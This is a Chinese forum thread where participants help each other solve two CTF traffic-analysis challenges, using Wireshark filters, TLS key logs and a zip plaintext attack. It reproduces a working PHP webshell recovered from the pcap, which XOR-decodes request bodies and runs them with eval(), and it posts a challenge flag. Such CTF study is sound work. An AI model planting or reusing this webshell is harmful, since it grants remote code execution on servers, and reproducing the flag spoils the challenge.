2个CTF流量题

GoogleHacking

题目1.数据被偷了的附件：https://wwo.lanzn.com/i4TE022sa2xi

题目2.简单流量题附件：https://wwo.lanzn.com/inS5U22sa35g


第2题导入了ssl.log。仍然无法解密数据包内容，没法导出flag.txt，求大佬指导

第1题过滤出来了一些编码，看着像冰蝎的流量，但是看不懂什么意思，求大佬指导

Byxs20

fy繁星 发表于 2024-6-26 23:35
，不知道这个Flag对不对？

肯定不对，安恒的题目的话，肯定是DASCTF{}
能提取一个这个出来，后面就不会了

[JavaScript] 纯文本查看 复制代码

?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45

async function pwdget(password) {     const encoder = new TextEncoder();     return window.crypto.subtle.importKey(         "raw",         encoder.encode(password),         { name: "PBKDF2" },         false,         ["deriveBits", "deriveKey"]     ); }   function arrBfToB64(buffer) {     let binary = '';     const bytes = new Uint8Array(buffer);     for (let i = 0; i < bytes.length; i++) {         binary += String.fromCharCode(bytes[i]);     }     return window.btoa(binary); }   function Encrypt() {     const plainText = "";     const password = "";     // const ivBase64 = "";     const iv = "";       const k = pwdget(password);     const key = window.crypto.subtle.deriveKey(         { name: "PBKDF2", salt: new TextEncoder().encode("hello-dasctf"), iterations: 100000, hash: 'SHA-256' },         k,         { name: "AES-GCM", length: 256 },         true,         ["encrypt", "decrypt"]     );       const encoder = new TextEncoder();     const encodedText = encoder.encode(plainText);     const ciphertext = window.crypto.subtle.encrypt(         { name: "AES-GCM", iv },         key,         encodedText     );       const base64Ciphertext = arrBfToB64(ciphertext); }

GoogleHacking

bushoukuaidi 发表于 2024-6-27 15:06
第二个 zip 采用crc32明文攻击  可以解开压缩里flag.txt  DASCTF{c956131a3e39707a19f88d4edaaa01d6}

第 ...

43b27fba4<?php
@error_reporting(0);
function Decrypt($data)
{
    $key="e45e329feb5d925b";
    $bs="base64_"."decode";
        $after=$bs($data."");
        for($i=0;$i<strlen($after);$i++) {
            $after[$i] = $after[$i]^$key[$i+1&15];
    }
    return $after;
}
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>59640d

就是这段代码。但是不知道怎么用，大佬能给指导下吗

你好，再见

第二张图有qq群，建议码掉

zunmx

手头没电脑，用平板稍微看了一下，这确实超出了我的能力范围了。
第一题：
尝试一下http && http.response.code==200 过滤器
发现好多post payload，里面是php代码，分析一下执行的是什么，可能存在flag



第二题：
sslkey.log 是解密https流量的，但是我也没发现和不配置这个有啥差异，最终还是和上个帖子一样，找到个zip，并且不知道密码。
id：87的地方ctrl+alt+shift+t 导出raw，删除一下http响应头就是zip文件了。


图片的话，平板截图文件太大，上传不了，只能降低一下照片品质了。

等等论坛里的大牛来看看这些问题吧。

GoogleHacking

zunmx 发表于 2024-6-26 22:27
手头没电脑，用平板稍微看了一下，这确实超出了我的能力范围了。
第一题：
尝试一下http && http.respons ...

第一题看着像冰蝎的流量，但是太多了， 过滤了很多字符串做了解码，还是不行，第二题我不知道那个压缩包密码从哪里找，还有ssl.log怎么用

zunmx

GoogleHacking 发表于 2024-6-26 22:34
第一题看着像冰蝎的流量，但是太多了， 过滤了很多字符串做了解码，还是不行，第二题我不知道那个压缩包 ...

ssl.log usage:

ctrl+shift+p
protocols --> tls --> (Pre)-Master-Secret log filename --> Browse...

fy繁星

GoogleHacking 发表于 2024-6-26 22:34
第一题看着像冰蝎的流量，但是太多了， 过滤了很多字符串做了解码，还是不行，第二题我不知道那个压缩包 ...

第一题是蚁剑的流量(defalut编码器)，用户上传了一个Shell.php，然后用蚁剑查看了upload下文件还上传了一个abc.php，但是看了一圈流量没看到什么有用的。这道题还有什么题目描述吗？

fy繁星

GoogleHacking 发表于 2024-6-26 22:34
第一题看着像冰蝎的流量，但是太多了， 过滤了很多字符串做了解码，还是不行，第二题我不知道那个压缩包 ...

<?php
        //$flag = "qAjsBOZBJVwujoHDJKlEP5y1jFpJFCdGu74+1ueutAbtSQpasobqxvUwg8YvlfKEPk+KNc/gyno=";
?>，不知道这个Flag对不对？

fy繁星

fy繁星 发表于 2024-6-26 23:35
，不知道这个Flag对不对？

tcp.stream eq 262，将这个流中的response的值用abc.php解密：<?php
@error_reporting(0);
function Decrypt($data)
{
    $key="e45e329feb5d925b";
    $bs="base64_"."decode";
        $after=$bs($data."");
        for($i=0;$i<strlen($after);$i++) {
            $after[$i] = $after[$i]^$key[$i+1&15];
    }
    return $after;
}
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>

GoogleHacking

fy繁星 发表于 2024-6-26 23:35
，不知道这个Flag对不对？

这个是那个数据流？

GoogleHacking

fy繁星 发表于 2024-6-26 23:41
tcp.stream eq 262，将这个流中的response的值用abc.php解密：

这个是不是要写解密脚本啊